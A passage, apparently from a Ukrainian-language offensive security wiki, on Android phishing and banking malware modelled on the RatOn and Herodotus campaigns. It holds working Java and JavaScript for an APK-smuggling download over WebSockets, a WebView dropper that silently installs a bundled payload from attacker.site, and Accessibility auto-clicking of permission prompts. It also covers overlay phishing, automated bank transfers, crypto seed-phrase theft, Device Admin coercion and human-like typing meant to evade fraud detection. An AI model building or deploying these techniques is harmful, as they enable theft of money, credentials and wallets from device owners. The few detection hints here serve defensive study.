// Accumulate binary chunks and drive fake Play progress UI const chunks = []; socket.on(“chunk”, (chunk) => chunks.push(chunk)); socket.on(“downloadProgress”, (p) => updateProgressBar(p));

// Assemble APK client‑side and trigger browser save dialog socket.on(“downloadComplete”, () => { const blob = new Blob(chunks, { type: “application/vnd.android.package-archive” }); const url = URL.createObjectURL(blob); const a = document.createElement(“a”); a.href = url; a.download = “app.apk”; a.style.display = “none”; document.body.appendChild(a); a.click(); });

</details>

Чому це обходить прості засоби контролю:
- Не розкривається статичний URL APK; payload відновлюється в пам'яті з кадрів WebSocket.
- Фільтри URL/MIME/розширень, які блокують прямі відповіді .apk, можуть не помітити двійкові дані, тунельовані через WebSockets/Socket.IO.
- Краулери та URL sandboxes, які не виконують WebSockets, не отримають payload.

Див. також WebSocket tradecraft і tooling:

<a class="content_ref" href="../../pentesting-web/websocket-attacks.md"><span class="content_ref_label">WebSocket Attacks</span></a>


## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration — кейс RatOn

Кампанія RatOn banker/RAT (ThreatFabric) — конкретний приклад того, як сучасні мобільні phishing-операції поєднують WebView droppers, Accessibility-driven UI automation, overlays/ransom, примусове активування Device Admin, Automated Transfer System (ATS), takeover крипто-гаманців та навіть NFC-relay orchestration. Цей розділ виділяє повторно використовувані техніки.

### Stage-1: WebView → native install bridge (dropper)
Атакувальники показують WebView, що вказує на сторінку нападника, і інжектять JavaScript-інтерфейс, який відкриває доступ до нативного інсталятора. Торкання HTML-кнопки викликає нативний код, який встановлює APK другого етапу, упакований у assets dropper'а, а потім одразу його запускає.

Мінімальна схема:

<details>
<summary>Stage-1 dropper minimal pattern (Java)</summary>
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
super.onCreate(b);
WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Object(){
@android.webkit.JavascriptInterface
public void installApk(){
try {
PackageInstaller pi = getPackageManager().getPackageInstaller();
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int id = pi.createSession(p);
try (PackageInstaller.Session s = pi.openSession(id);
InputStream in = getAssets().open("payload.apk");
OutputStream out = s.openWrite("base.apk", 0, -1)){
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
}
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
pi.commit(id, status.getIntentSender());
} catch (Exception e) { /* log */ }
}
}, "bridge");
setContentView(wv);
wv.loadUrl("https://attacker.site/install.html");
}
}

HTML на сторінці:

<button onclick="bridge.installApk()">Install</button>

Після встановлення dropper запускає payload через явний package/activity:

Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);

Ідея для виявлення: недовірені додатки, що викликають addJavascriptInterface() і відкривають інсталятороподібні методи для WebView; APK, що містить вбудований вторинний payload у assets/ і викликає Package Installer Session API.

Канал згоди: Accessibility + Device Admin + follow-on runtime prompts

Stage-2 відкриває WebView, який розміщує сторінку «Access». Її кнопка викликає експортований метод, що переводить жертву в налаштування Accessibility і просить увімкнути шкідливий сервіс. Після надання доступу malware використовує Accessibility, щоб автоматично натискати через наступні діалоги runtime permission (contacts, overlay, manage system settings, etc.) і запитує Device Admin.

• Accessibility програмно допомагає приймати подальші запити, знаходячи в node-tree кнопки типу «Allow»/«OK» і ініціюючи кліки.
• Перевірка/запит дозволу overlay:

if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
Uri.parse("package:" + ctx.getPackageName()));
ctx.startActivity(i);
}

Див. також:

Accessibility Services Abuse

Фішинг/вимагання через оверлей у WebView

Оператори можуть відправляти команди для:

• відобразити оверлей на весь екран із URL, або
• передати вбудований HTML, який завантажується в оверлей WebView.

Ймовірне використання: примус (введення PIN), відкриття гаманця для перехоплення PIN, повідомлення про викуп. Майте команду, яка перевіряє та забезпечує наявність дозволу на оверлей, якщо його бракує.

Модель віддаленого керування — текстовий псевдо-екран + трансляція екрана

• Low-bandwidth: періодично знімати дерево вузлів Accessibility, серіалізувати видимі тексти/ролі/межі і відправляти на C2 як псевдо-екран (команди типу txt_screen одноразово і screen_live для безперервної передачі).
• High-fidelity: запитувати MediaProjection і запускати трансляцію/запис екрана за запитом (команди типу display / record).

ATS playbook (автоматизація банківського додатку)

Отримавши JSON task, відкрити bank app, керувати UI через Accessibility, використовуючи поєднання текстових запитів і натискань по координатах, та ввести платіжний PIN жертви коли буде запит.

Приклад задачі:

{
"cmd": "transfer",
"receiver_address": "ACME s.r.o.",
"account": "123456789/0100",
"amount": "24500.00",
"name": "ACME"
}

Приклади текстів, що зустрічаються в одному цільовому потоці (CZ → EN):

• “Nová platba” → “Нова оплата”
• “Zadat platbu” → “Ввести платіж”
• “Nový příjemce” → “Новий одержувач”
• “Domácí číslo účtu” → “Домашній номер рахунку”
• “Další” → “Далі”
• “Odeslat” → “Відправити”
• “Ano, pokračovat” → “Так, продовжити”
• “Zaplatit” → “Оплатити”
• “Hotovo” → “Готово”

Оператори також можуть перевіряти/підвищувати ліміти переказів за допомогою команд на кшталт check_limit та limit, які подібним чином взаємодіють з інтерфейсом лімітів.

Crypto wallet seed extraction

Мішені, такі як MetaMask, Trust Wallet, Blockchain.com, Phantom. Потік: розблокувати (вкрадений PIN або наданий пароль), перейти в Security/Recovery, показати/відкрити seed-фразу, keylog/exfiltrate її. Реалізуйте селектори, що враховують локаль (EN/RU/CZ/SK), щоб стабілізувати навігацію між мовами.

Device Admin coercion

Device Admin APIs використовуються для збільшення можливостей PIN-capture та утруднення дій жертви:

• Миттєве блокування:

dpm.lockNow();

• Прострочити поточні облікові дані, щоб примусити зміну (Accessibility перехоплює новий PIN/пароль):

dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner

• Примусове розблокування без біометрії шляхом відключення keyguard biometric features:

dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);

Примітка: Багато контролів DevicePolicyManager вимагають Device Owner/Profile Owner на сучасних Android; деякі OEM-збірки можуть бути менш суворими. Завжди перевіряйте на цільовій OS/OEM.

Оркестрація NFC-реле (NFSkate)

Stage-3 може встановити та запустити зовнішній модуль NFC-relay (наприклад, NFSkate) і навіть передати йому HTML-шаблон, щоб керувати жертвою під час реле. Це дозволяє виконувати безконтактне card-present зняття готівки паралельно з онлайн ATS.

Джерело: NFSkate NFC relay.

Набір команд оператора (приклад)

• UI/стан: txt_screen, screen_live, display, record
• Соціальні: send_push, Facebook, WhatsApp
• Накладки: overlay (inline HTML), block (URL), block_off, access_tint
• Гаманці: metamask, trust, blockchain, phantom
• ATS: transfer, check_limit, limit
• Пристрій: lock, expire_password, disable_keyguard, home, back, recents, power, touch, swipe, keypad, tint, sound_mode, set_sound
• Комунікації/Розвідка: update_device, send_sms, replace_buffer, get_name, add_contact
• NFC: nfs, nfs_inject

Accessibility-орієнтований обхід детекції ATS: людоподібна каденція введення та подвійна ін’єкція тексту (Herodotus)

Зловмисники все частіше поєднують автоматизацію через Accessibility з антидетекцією, налаштованою проти базової поведінкової біометрії. Нещодавній banker/RAT демонструє два взаємодоповнюючі режими доставки тексту та перемикач для оператора для імітації людського набору з рандомізованою каденцією.

• Режим виявлення: перераховує видимі вузли з селекторами та bounds, щоб точно націлити поля введення (ID, text, contentDescription, hint, bounds) перед дією.
• Подвійна ін’єкція тексту:
• Режим 1 – ACTION_SET_TEXT безпосередньо на цільовому вузлі (стабільно, без клавіатури);
• Режим 2 – встановлення clipboard + ACTION_PASTE у сфокусований вузол (працює коли direct setText заблоковано).
• Людоподібна каденція: розділяє рядок, наданий оператором, і доставляє його символ-за-символом з рандомізованими затримками 300–3000 ms між подіями, щоб уникнути евристик «машинного набору». Реалізується або шляхом поступового збільшення значення через ACTION_SET_TEXT, або вставкою по одному символу.

</details>

Блокуючі накладки для маскування шахрайства:
- Відтворюйте повноекранний `TYPE_ACCESSIBILITY_OVERLAY` з керованою оператором прозорістю; тримайте його непрозорим для жертви, поки під ним виконується віддалена автоматизація.
- Зазвичай доступні команди: `opacityOverlay <0..255>`, `sendOverlayLoading <html/url>`, `removeOverlay`.

Мінімальна накладка з регульованою alpha:
```java
View v = makeOverlayView(ctx); v.setAlpha(0.92f); // 0..1
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
WindowManager.LayoutParams.TYPE_ACCESSIBILITY_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
PixelFormat.TRANSLUCENT);
wm.addView(v, lp);